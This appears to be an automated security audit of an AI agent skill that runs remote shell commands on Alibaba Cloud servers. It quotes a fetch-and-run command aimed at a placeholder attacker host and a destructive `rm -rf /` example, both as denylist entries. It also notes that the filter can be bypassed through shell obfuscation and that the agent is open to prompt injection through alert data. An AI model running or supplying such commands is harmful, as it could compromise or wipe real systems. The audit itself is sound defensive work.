alibabacloud-sas-openclaw-security
Pass
Audited by Gen Agent Trust Hub on Apr 1, 2026
Risk Level: SAFE
Findings: COMMAND_EXECUTION
Full Analysis
- [COMMAND_EXECUTION]: The skill facilitates the remote execution of shell commands on Alibaba Cloud ECS instances using the `run_cloud_assistant_command.py` script and the official `aliyun` CLI. This is the core functionality of the skill and is documented with explicit security guidelines and user confirmation requirements.
- [REMOTE_CODE_EXECUTION]: Several automated alerts regarding remote code execution (e.g., `curl http://evil.com/x.sh | bash`) were investigated. These specific strings were found within a security denylist (`_BLOCKED_PATTERNS`) in `scripts/run_cloud_assistant_command.py`. They serve as regex patterns and descriptive examples for a filter designed to prevent malicious command execution, not to perform it.
- [COMMAND_EXECUTION]: The script `scripts/run_cloud_assistant_command.py` implements a regex-based security control to block destructive operations (such as `rm -rf /`) and reverse shell attempts. While this provides a layer of defense, users should note that regex-based filters for shell commands are potentially bypassable via shell obfuscation or expansion techniques.
- [PROMPT_INJECTION]: The skill ingests data from external security alerts and vulnerability records to generate Markdown reports and security summaries. This creates a surface for indirect prompt injection (Category 8) if an attacker can influence the metadata (such as vulnerability names) within the user's Alibaba Cloud environment.
Audit Metadata